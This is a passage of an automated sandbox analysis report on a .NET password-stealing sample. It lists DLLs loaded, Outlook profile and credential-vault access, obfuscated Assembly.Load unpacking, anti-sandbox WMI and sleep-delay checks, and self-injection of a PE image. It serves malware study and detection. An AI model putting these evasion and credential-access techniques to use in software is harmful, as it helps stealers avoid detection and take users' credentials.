Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, MainForm.cs | .Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Client"}}, (string[])null, (bool[])null)
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.cs | .Net Code: xocnug2MP1 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.cs | .Net Code: xocnug2MP1 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.5900000.5.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Static PE information: section name: .text entropy: 7.936637319472689
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, vXYwLM6affvGl1LPOo.cs | High entropy of concatenated method names: 'yih92uOZyQ', 'S3G9YLiO66', 'Q7F9ObyBsE', 'Kk09I17Irp', 'wdC9finRyv', 'jkN9XO07CO', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, WkF8QKmv6uqjX95PHf.cs | High entropy of concatenated method names: 't8HCgbuYSc', 'mewCcPg60A', 'ToString', 'Q4NCWgQRxu', 'GH4CajFshm', 'kDkCBrf8iI', 'dlGCF00Sff', 'y9mCRrB0cG', 'RnEC0iuSl1', 'OsJC83oOSt'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, TcVC0Xedd5l3T2VdXk.cs | High entropy of concatenated method names: 'C0KCq6mVNk', 'MqECjMgJtn', 'D1J9bGbij7', 'oCr94FMJMU', 'EyKCStWlqV', 'b2PCsO2CR7', 'QDfCkqt9oT', 'Y4yCfInT47', 'FRhCDlJ0WC', 'FSdCVXapeg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, bZcao94bdgy2x14WBPd.cs | High entropy of concatenated method names: 'X8157vKUkL', 'rAS5HyICcO', 'jg85ugNSlU', 'ecR5Kos4x4', 'eKd53ZPLsq', 'poT5QaRUJR', 'fMf5huUcc0', 'YEC5TdHQvi', 'Iyj5pLBUnD', 'lWA5MD2SHu'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, OW4YfnoSj5wlFPuOx9.cs | High entropy of concatenated method names: 'ckiuvw9CA', 'uWcK8kCIV', 'M6HQsse9D', 'VtWhoZINl', 'njCptoWCp', 'PCqMcD6ZM', 'z70ibP5P3jyyjrdSGQ', 'qOMp2aoIpu8X48OW3P', 'USk9NhbRq', 'Vc0vo8Tk6'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, SRgaAAwhAm8UliGP0b.cs | High entropy of concatenated method names: 'sqC07wcMMx', 'EMu0HQQ7LY', 'IYc0uOecGh', 'DRF0KZbPFI', 'lnW03CaJhq', 'GX60QVtWlB', 'Wa40hDCeI4', 'zbu0TxYuL8', 'cCO0pYMy7y', 'l680MtQlvn'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, Hc9U8kz21TDVdAQLYU.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sX55Gxg0nm', 'zIl5xP4L9E', 'j1o5y6uV6X', 'R5S5CK401h', 'zSi59Yeor6', 'oRq55DRO7f', 'REF5vvajxY'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, lTWl2xpfefJy2fW2xt.cs | High entropy of concatenated method names: 'ECBBKhmuRV', 'h3jBQFaSKS', 'OJcBTR8XhO', 'XqtBpepUlW', 'dHoBxg5Shp', 'TqnByajJSt', 'T6nBCQnDW3', 'x69B9FbNgB', 'NevB53u1Kh', 'a7jBvRfg7J'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.cs | High entropy of concatenated method names: 'evEUNWT4mX', 'o65UWYGcr1', 'vihUaL7DHR', 'BDjUBbOC7m', 'RhYUFhPPyX', 'pgRURSj5PR', 'Ed1U0DFPXW', 'tR1U8CvAE3', 'aKKUPZOhbE', 'rr7UgLxbVK'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, mWClDI2yB8UHgKXbtY.cs | High entropy of concatenated method names: 'yVBRNohyD4', 'kj4RacwYgb', 'b3ARFE1ZxB', 'LYXR0BYuXu', 'L4nR86PlFl', 'zQrFLvCA1Z', 'B87Fe9ts6L', 'D6yFiB2csA', 'DERFqbpqKm', 'up4F6jGMon'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, MB7b0NfyoxYV0SQiFl.cs | High entropy of concatenated method names: 'vgGxtOmQqW', 'DSOxs3Emlx', 'QyGxfBFIJA', 'mKMxD0NfS1', 'zR1xYk8QDK', 'BHdxOoviK6', 'TpfxImDk25', 'WamxXewxBA', 'mInxJBeWp2', 'qAUx1eAEJf'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, NkHH8aaHieshbOGjZ0.cs | High entropy of concatenated method names: 'Dispose', 'B6G46TNFqZ', 'bwwoYRubkX', 'Buipp4ULiD', 'hW94jVVgOt', 'UDd4zbvcOu', 'ProcessDialogKey', 'FplobXYwLM', 'gffo4vGl1L', 'lOoooCuUZb'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, quUZbOjZItL0Y37eit.cs | High entropy of concatenated method names: 'XwN54c4e6D', 'buL5UJG8aW', 'mo65n6hC91', 'z0y5WbMDZG', 'pBm5a0M5oC', 'Tby5Fi3VyZ', 'TAg5RTL5IE', 'LbA9iREX9V', 'zyl9qwMjYH', 'XIx96eCwvt'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, XYYqf4n73hAkgG0EWi.cs | High entropy of concatenated method names: 'hd440ZvWos', 'RY548WcGlw', 'ofe4gfJy2f', 'f2x4ctOCxN', 'vlL4xbfgWC', 'vDI4yyB8UH', 'm83J9YwjZiyV7qyNfO', 'XTFUGO2Cra9GustkTx', 'VOK440mLli', 'OoZ4U6CxwO'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ICxNAXMVLRDUxllLbf.cs | High entropy of concatenated method names: 'FuRF3PhaAw', 'CjqFh17KjM', 'tO3BOXul7h', 'X7CBIsA1v8', 'UgsBXm41x4', 'u8YBJHknoF', 'B1IB1yPutJ', 'NjyBZaNEkP', 'AWVBwd3mX8', 'G9TBt72lTL'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, aZvWosTDY5WcGlwOCb.cs | High entropy of concatenated method names: 'YcZafvJC9c', 'JZQaDeT0ga', 'BobaVvDQ7T', 'YEfamsrSRX', 'lsFaLqway4', 'IDeaewX0ix', 'sR3aiRQmgP', 'jg5aqHwMdI', 'T08a6Mgiot', 'wqwajxgwrE'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, n0d30tkUjmZhkVdp3W.cs | High entropy of concatenated method names: 'JtBGTrVcUT', 'm4IGpwDKto', 'VPfG2DWTRn', 'R3pGYnuy5G', 'Gn9GIhU9LC', 'HQoGXQ4xFr', 'dkyG1Q93Mx', 'myJGZODWtI', 'RqdGtAE4i9', 'flaGSZFDQq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, sDodVE1Sj2ONgcKV3f.cs | High entropy of concatenated method names: 'x2r0W1BIeF', 'r5h0Bs23Xj', 'sGH0Rn6A00', 'b6eRjCMo8E', 'zAARzehCLN', 'w100bYZNDN', 'LuV04R5Pkv', 'Ape0oSAT3b', 'v810UEBRJt', 'OiF0nf70ne'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, f9VVgOqtLDdbvcOuMp.cs | High entropy of concatenated method names: 'QRa9Wi60Ok', 'YU49aBLkyd', 'YfT9BcxY8w', 'gek9FBQn8m', 'CeU9Rbwc0j', 'cDD90YFvb7', 'WXh98ZJcHv', 'V6N9PWoUZx', 'TAB9gxlKgC', 'hdA9clSoVb'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, vXYwLM6affvGl1LPOo.cs | High entropy of concatenated method names: 'yih92uOZyQ', 'S3G9YLiO66', 'Q7F9ObyBsE', 'Kk09I17Irp', 'wdC9finRyv', 'jkN9XO07CO', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, WkF8QKmv6uqjX95PHf.cs | High entropy of concatenated method names: 't8HCgbuYSc', 'mewCcPg60A', 'ToString', 'Q4NCWgQRxu', 'GH4CajFshm', 'kDkCBrf8iI', 'dlGCF00Sff', 'y9mCRrB0cG', 'RnEC0iuSl1', 'OsJC83oOSt'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, TcVC0Xedd5l3T2VdXk.cs | High entropy of concatenated method names: 'C0KCq6mVNk', 'MqECjMgJtn', 'D1J9bGbij7', 'oCr94FMJMU', 'EyKCStWlqV', 'b2PCsO2CR7', 'QDfCkqt9oT', 'Y4yCfInT47', 'FRhCDlJ0WC', 'FSdCVXapeg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, bZcao94bdgy2x14WBPd.cs | High entropy of concatenated method names: 'X8157vKUkL', 'rAS5HyICcO', 'jg85ugNSlU', 'ecR5Kos4x4', 'eKd53ZPLsq', 'poT5QaRUJR', 'fMf5huUcc0', 'YEC5TdHQvi', 'Iyj5pLBUnD', 'lWA5MD2SHu'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, OW4YfnoSj5wlFPuOx9.cs | High entropy of concatenated method names: 'ckiuvw9CA', 'uWcK8kCIV', 'M6HQsse9D', 'VtWhoZINl', 'njCptoWCp', 'PCqMcD6ZM', 'z70ibP5P3jyyjrdSGQ', 'qOMp2aoIpu8X48OW3P', 'USk9NhbRq', 'Vc0vo8Tk6'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, SRgaAAwhAm8UliGP0b.cs | High entropy of concatenated method names: 'sqC07wcMMx', 'EMu0HQQ7LY', 'IYc0uOecGh', 'DRF0KZbPFI', 'lnW03CaJhq', 'GX60QVtWlB', 'Wa40hDCeI4', 'zbu0TxYuL8', 'cCO0pYMy7y', 'l680MtQlvn'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, Hc9U8kz21TDVdAQLYU.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sX55Gxg0nm', 'zIl5xP4L9E', 'j1o5y6uV6X', 'R5S5CK401h', 'zSi59Yeor6', 'oRq55DRO7f', 'REF5vvajxY'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, lTWl2xpfefJy2fW2xt.cs | High entropy of concatenated method names: 'ECBBKhmuRV', 'h3jBQFaSKS', 'OJcBTR8XhO', 'XqtBpepUlW', 'dHoBxg5Shp', 'TqnByajJSt', 'T6nBCQnDW3', 'x69B9FbNgB', 'NevB53u1Kh', 'a7jBvRfg7J'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.cs | High entropy of concatenated method names: 'evEUNWT4mX', 'o65UWYGcr1', 'vihUaL7DHR', 'BDjUBbOC7m', 'RhYUFhPPyX', 'pgRURSj5PR', 'Ed1U0DFPXW', 'tR1U8CvAE3', 'aKKUPZOhbE', 'rr7UgLxbVK'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, mWClDI2yB8UHgKXbtY.cs | High entropy of concatenated method names: 'yVBRNohyD4', 'kj4RacwYgb', 'b3ARFE1ZxB', 'LYXR0BYuXu', 'L4nR86PlFl', 'zQrFLvCA1Z', 'B87Fe9ts6L', 'D6yFiB2csA', 'DERFqbpqKm', 'up4F6jGMon'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, MB7b0NfyoxYV0SQiFl.cs | High entropy of concatenated method names: 'vgGxtOmQqW', 'DSOxs3Emlx', 'QyGxfBFIJA', 'mKMxD0NfS1', 'zR1xYk8QDK', 'BHdxOoviK6', 'TpfxImDk25', 'WamxXewxBA', 'mInxJBeWp2', 'qAUx1eAEJf'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, NkHH8aaHieshbOGjZ0.cs | High entropy of concatenated method names: 'Dispose', 'B6G46TNFqZ', 'bwwoYRubkX', 'Buipp4ULiD', 'hW94jVVgOt', 'UDd4zbvcOu', 'ProcessDialogKey', 'FplobXYwLM', 'gffo4vGl1L', 'lOoooCuUZb'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, quUZbOjZItL0Y37eit.cs | High entropy of concatenated method names: 'XwN54c4e6D', 'buL5UJG8aW', 'mo65n6hC91', 'z0y5WbMDZG', 'pBm5a0M5oC', 'Tby5Fi3VyZ', 'TAg5RTL5IE', 'LbA9iREX9V', 'zyl9qwMjYH', 'XIx96eCwvt'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, XYYqf4n73hAkgG0EWi.cs | High entropy of concatenated method names: 'hd440ZvWos', 'RY548WcGlw', 'ofe4gfJy2f', 'f2x4ctOCxN', 'vlL4xbfgWC', 'vDI4yyB8UH', 'm83J9YwjZiyV7qyNfO', 'XTFUGO2Cra9GustkTx', 'VOK440mLli', 'OoZ4U6CxwO'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ICxNAXMVLRDUxllLbf.cs | High entropy of concatenated method names: 'FuRF3PhaAw', 'CjqFh17KjM', 'tO3BOXul7h', 'X7CBIsA1v8', 'UgsBXm41x4', 'u8YBJHknoF', 'B1IB1yPutJ', 'NjyBZaNEkP', 'AWVBwd3mX8', 'G9TBt72lTL'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, aZvWosTDY5WcGlwOCb.cs | High entropy of concatenated method names: 'YcZafvJC9c', 'JZQaDeT0ga', 'BobaVvDQ7T', 'YEfamsrSRX', 'lsFaLqway4', 'IDeaewX0ix', 'sR3aiRQmgP', 'jg5aqHwMdI', 'T08a6Mgiot', 'wqwajxgwrE'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, n0d30tkUjmZhkVdp3W.cs | High entropy of concatenated method names: 'JtBGTrVcUT', 'm4IGpwDKto', 'VPfG2DWTRn', 'R3pGYnuy5G', 'Gn9GIhU9LC', 'HQoGXQ4xFr', 'dkyG1Q93Mx', 'myJGZODWtI', 'RqdGtAE4i9', 'flaGSZFDQq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, sDodVE1Sj2ONgcKV3f.cs | High entropy of concatenated method names: 'x2r0W1BIeF', 'r5h0Bs23Xj', 'sGH0Rn6A00', 'b6eRjCMo8E', 'zAARzehCLN', 'w100bYZNDN', 'LuV04R5Pkv', 'Ape0oSAT3b', 'v810UEBRJt', 'OiF0nf70ne'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, f9VVgOqtLDdbvcOuMp.cs | High entropy of concatenated method names: 'QRa9Wi60Ok', 'YU49aBLkyd', 'YfT9BcxY8w', 'gek9FBQn8m', 'CeU9Rbwc0j', 'cDD90YFvb7', 'WXh98ZJcHv', 'V6N9PWoUZx', 'TAB9gxlKgC', 'hdA9clSoVb'
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: 1330000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: 3010000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: 5010000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: 8750000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: 9750000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: 9930000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: A930000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: 1870000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: 32B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: 31C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Thread delayed: delay time: 922337203685477 (2 entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Window / User API: threadDelayed 597
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe TID: 5680 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe TID: 7084 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Thread delayed: delay time: 922337203685477 (2 entries)
Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283905345.00000000016A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll (the name of the built-in AF_HYPERV Winsock provider that every Windows 10 install carries, not by itself evidence that the sample probed for Hyper-V)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe VolumeInformation (2 entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation (2 entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation (2 entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation (2 entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation (2 entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
